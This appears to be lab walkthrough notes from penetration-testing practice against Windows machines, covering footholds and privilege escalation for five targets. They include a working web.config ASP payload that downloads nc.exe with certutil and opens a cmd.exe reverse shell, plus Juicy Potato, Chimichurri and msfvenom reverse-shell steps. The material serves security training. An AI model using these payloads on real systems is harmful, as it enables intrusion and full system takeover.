Skip to main content

Web 5

Web 41: Adobe ColdFusion 8

Target: Windows Server 2008 R2 Standard

Foothold: Unauthenticated File Upload

  • Unauthenticated file upload vulnerability with the upload.cfm script.
  • Exploit DB entry: 50057
  • The Python script auto-generates a msfvenom and uploads the .jsp web shell and executes

Privilege Escalation: MS10-059

.\Chimichurri.exe <kali-ip> <kali-tcp-port>

Web 42: WebDAV RCE

Target: Windows Server 2003

Foothold: CVE-2017-7269

Privilege Escalation: Token Impersonation

  • IIS Server has SeImpersonate which allows token impersonation
  • This exploit works perfectly for the target operating system:
  • Transfer a the exploit
  • Transfer a msfvenom reverse shell payload
  • Start a listener and use the exploit to run the reverse shell payload as SYSTEM

Web 43: Custom API

Target: Windows 10 Pro 1903

Foothold: Sensitive Information Leak

  • Unauthenticated user can issue a POST request to the API
  • Has an API endpoint which returns running processes
  • Reveals command line parameters
  • One of the command-line paramters is a base 64 encoded password and username
  • This provides SSH access to the target

Privilege Escalation: Command Execution via Privileged Web Server

  • Enumerating running ports reveals an internal server on TCP/80
  • Also, found a password-protected PDF with a weak password
    • Cracked with pdf2john and john
    • Revealed information about command execution via the web server
  • Port forward to the local server and test it out
    • curl http://localhost:8080/?whoami
    • Running as SYSTEM
  • Use privileged web server to add SSH user to local admins group
    • Log out of SSH and log back in
    • Use psexec -s cmd.exe to get SYSTEM shell

Web 44: XAMPP PHP Include RFI

Target: Windows 10 Pro Build 19042

Foothold: PHP RCE via RFI

Privilege Escalation: Privileged Scheduled Task

  • A task running as SYSTEM loads a file in a world-readable directory
  • Create a msfvenom payload and overwrite the task binary
  • Start a listener
  • Catch SYSTEM shell when task runs

Web 45: IIS File Upload Vulnerability

Target: Windows Server 2008 R2 x64

Foothold: ASP Code RCE via File Upload

  • Vulnerable server allows upload of .config file
  • Files are uploaded to globally readable directory /uploadedfiles/
<?xml version="1.0" encoding="UTF-8"?>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
               <remove fileExtension=".config" />
               <remove segment="web.config" />
Set objShell = CreateObject("WScript.Shell")
objShell.Exec("cmd.exe /c certutil.exe -urlcache -split -f C:\Windows\Temp\nc.exe")
objShell.Exec("cmd.exe /c C:\Windows\Temp\nc.exe 443 -e C:\Windows\System32\cmd.exe")
  • Host nc.exe via Python web server
  • Load web.config file: http://server-ip/uploadedfiles/web.config
  • File is downloaded from attack box and payload is run

Privilege Escalation: SeImpersonatePrivilege

  • User has impersonate privilege
  • Windows Server 2008 R2 is vulnerable to Juicy Potato
  • Create an msfvenom privilege escalation payload
  • Download Juicy Potato binary
  • Host both via Python web server and transfer to target
  • Run Juicy Potato
set clsid={4991d34b-80a1-4291-83b6-3328366b9097}
.\jp.exe -p C:\Users\merlin\Desktop\privesc.exe -l 4000 -t * -c %clsid%